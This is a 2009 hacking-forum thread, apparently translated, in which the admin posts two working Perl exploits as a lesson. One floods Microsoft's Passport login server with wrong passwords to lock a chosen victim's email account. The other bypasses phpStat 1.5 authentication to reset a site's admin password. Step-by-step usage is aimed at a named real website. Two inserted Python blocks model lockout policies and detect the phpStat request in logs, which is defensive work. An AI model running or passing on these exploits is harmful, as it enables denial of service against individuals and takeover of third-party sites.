Admin Admin
Posts: 303 Registration date: 28/05/2007
| Subject: DoS vulnerability in MSN Passport, 9/2/2009, 14:33 | |
| Peace be upon you. There is a vulnerability in this server, login.passport.com, which belongs to Hotmail and which you surely know. You can attack it through the e-mail address you want to block. The weakness in this server is that it does not block the IP address that is doing the flooding; it blocks the owner of the e-mail address, that is, it locks the e-mail account itself. The key to this exploit is lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7
It sends wrong passwords until the account is locked. You must start the flood before the victim logs in. I won't keep you long; the code is below, in Perl. Save it with the .pl extension and run it against the e-mail address you want.
#!/usr/bin/perl
#
# by: Simo aka _6mO_HaCk <simo_at_morx_org>
# 1 december 2005
# MorX security research team
# www.morx.org
#
# Details:
#
# it seems that msn passport users using services such hotmail email and msn messenger and more
# are vulnerable to a remote denial of service, that allow any remote attacker to block access
# to their accounts, this problem is produced by the passport login server (login.passport.com)
# which locks users accounts when receiving wrong passwords instead of blocking the IP address
# where from the wrong passwords are being sent, so if an attacker knows a target email, the
# vulnerability can be exploited by sending continuous wrong passwords to login.passport.com:80
# after a certain number of wrong attempts the account will be blocked disallowing the victim to
# login to all msn passport network, including email and Instant Messaging services until the
# attacker stops the attack
#
# Note: The attack must start before the victim log in. Once the attack starts the victim
# will be unable to sign in.
#
# i would like to apologize in advance if this is a known issue, however this vulnerability is still
# exploitable and it's a very serious problem. hopefully the fact that i m publishing this info and
# this proof of concept exploit will push microsoft to patch their server soon
#
# Vulnerable:
# login.passport.com (used for all accounts authentication except the ones at msn.com)
# : blocks the account instead of the IP address
#
# Not vulnerable:
# msnialogin.passport.com (used only for accounts at msn.com authentication)
# : blocks the IP address instead of the account, giving the remote attacker no choice except
# in case if the attacker can pass the attack thru the victim IP address or if the attacker is
# connected from the same LAN sharing the same IP address with the target
#
# Thanks to massine and handrix for helping me test this
#
# PoC: www.morx.org/fuckmsn.txt

use IO::Socket;

if(!defined($ARGV[0])) {
    system (clear);
    print "\n";
    print "=================================================\n";
    print "--- MSN Passport accounts remote DoS by _6mO_HaCk\n";
    print "--- MorX Security Research Team www.MorX.org\n";
    print "=================================================\n";
    print "--- Usage: perl $0 <Target_Email>\n\n";
    exit;
}

$TARGET = $ARGV[0];
$PORT = "80";
$SERVER = "login.passport.com";
$PASSWORD = "FUCKMSN"; # MSNs nobody like them, fux0r them ... ;>
$KEYS = "lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7";
$NUMBER = "99999999999999999999999999999999999999999999999999999";
$COMMAND1 = "GET /login2.srf HTTP/1.0";
$COMMAND2 = "Accept: */*";
$COMMAND3 = "Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=$TARGET,pwd=$PASSWORD,$KEYS";

print "=================================================\n";
print "--- MSN Passport accounts remote DoS by _6mO_HaCk\n";
print "--- MorX Security Research Team www.MorX.org\n";
print "=================================================\n";
print "[+] Attacking $TARGET ...\n";
print "[-] CTRL + C To Stop\n";

for($count=0;$count<=$NUMBER;$count++) {
    $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$SERVER",PeerPort=>"$PORT") || die "Can't connect to $SERVER";
    print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";
    $remote->autoflush();
}

print "Done, try again if needed ";
| |
|
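The lockout behaviour described in the post above, modelled from the server side as an added example (not part of the original post or the MorX code): it replays a constructed wrong-password flood under an account-keyed counter and under a source-IP-keyed counter, then reports what the account owner's valid login gets back. The threshold, the class and function names and the sample addresses are assumptions.

```python
from collections import defaultdict

MAX_FAILURES = 5  # assumed threshold; the post gives no number


class LoginGate:
    """Counts failed logins under a chosen lockout key."""

    def __init__(self, key_by):
        if key_by not in ("account", "source_ip"):
            raise ValueError(key_by)
        self.key_by = key_by
        self.failures = defaultdict(int)

    def _key(self, account, ip):
        # "account" mirrors the behaviour reported for login.passport.com,
        # "source_ip" the behaviour reported for msnialogin.passport.com.
        return account if self.key_by == "account" else ip

    def attempt(self, account, ip, password_ok):
        """Return 'locked', 'denied' or 'ok' for one login attempt."""
        key = self._key(account, ip)
        if self.failures[key] >= MAX_FAILURES:
            return "locked"
        if not password_ok:
            self.failures[key] += 1
            return "denied"
        self.failures[key] = 0
        return "ok"


def owner_outcome(key_by, flood_ip, owner_ip, flood_size=20):
    """Replay a constructed wrong-password flood, then the owner's valid login."""
    gate = LoginGate(key_by)
    account = "victim@example.test"  # constructed sample account
    for _ in range(flood_size):
        gate.attempt(account, flood_ip, password_ok=False)
    return gate.attempt(account, owner_ip, password_ok=True)
```

With the counter keyed on the account, the owner is locked out from any address; keyed on the source IP, the owner is only affected when sharing the flooding address, which is the shared-LAN case the exploit header mentions.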
Admin Admin
Posts: 303 Registration date: 28/05/2007
| Subject: Re: DoS vulnerability in MSN Passport, 9/2/2009, 14:49 | |
| Now copy the exploit code, save it as sherba.pl, put it inside the folder C:\Perl\bin, and drag it into DOS or call it from there. Code:
#!/usr/bin/perl
#####################################################################
#T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
#####################################################################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail : Alpha_Programmer@Yahoo.com#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
#####################################################################
# Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
#####################################################################
use IO::Socket;

if (@ARGV < 3) {
    print "\n==========================================\n";
    print " \n -- Exploit By Alpha Programmer --\n\n";
    print " Trap-Set UnderGrounD Hacking Team \n\n";
    print " Usage: \n\n";
    print "==========================================\n\n";
    print "Examples:\n\n";
    print " phpStat.pl www.Site.com /phpstat/ 12345\n";
    exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n\n\n\n";

print "[+]Sending H3ll Packet ...\n";
print $remote $http;
sleep(1);
print "[+]Wait For Authentication Bypass ...\n";
sleep(100);
while (<$remote>) { }
print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
print "[+]User: admin\n";
print "[+]Pass: $ARGV[2]";
#

Now change the usage to the name of the vulnerable site: phpStat.pl www.Site.com /phpstat/ 12345. Change the site name to the name of the vulnerable site; this is the vulnerable site, and after the change it becomes like this:
Code: phpStat.pl www.maverickqueen.com /phpstat/ 12345
Note that the spacing must be kept; this is what we changed inside the code.
Now save the changes, drag the file into DOS, follow the picture and see what I have written. | |
|
Admin Admin
Posts: 303 Registration date: 28/05/2007
| Subject: Re: DoS vulnerability in MSN Passport, 9/2/2009, 14:51 | |
| Now it will tell you: ]OK ! Now Goto www.maverickqueen.com/phpstat/setup.php And L0gin Whith. That means go to the following path and log in with the password and user name shown in front of you. The lesson is over; I hope you benefited, and for any question, go ahead. Peace. | |
|
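For defenders reviewing web server logs, the request the phpStat script above sends can be picked out by its shape: a `setup.php` request carrying `check=yes` together with `username` and `password` parameters. This is an added example, not part of the original posts; the function name, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client address, request line and status of a combined-format access log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def flag_setup_requests(lines):
    """Return (ip, path, status) for setup.php requests with check/username/password."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/setup.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("check") == ["yes"] and "username" in params and "password" in params:
            hits.append((m.group("ip"), url.path, int(m.group("status"))))
    return hits


# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Feb/2009:14:49:01 +0000] "GET /phpstat/setup.php?check=yes&username=admin&password=12345 HTTP/1.0" 200 512',
    '198.51.100.20 - - [09/Feb/2009:14:50:10 +0000] "GET /phpstat/index.php HTTP/1.1" 200 2048',
    '198.51.100.20 - - [09/Feb/2009:14:51:33 +0000] "GET /phpstat/setup.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in flag_setup_requests(SAMPLE_LOG):
        print(hit)
```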
Admin Admin
Posts: 303 Registration date: 28/05/2007
| Subject: Re: DoS vulnerability in MSN Passport, 9/2/2009, 14:53 | |
| | |
|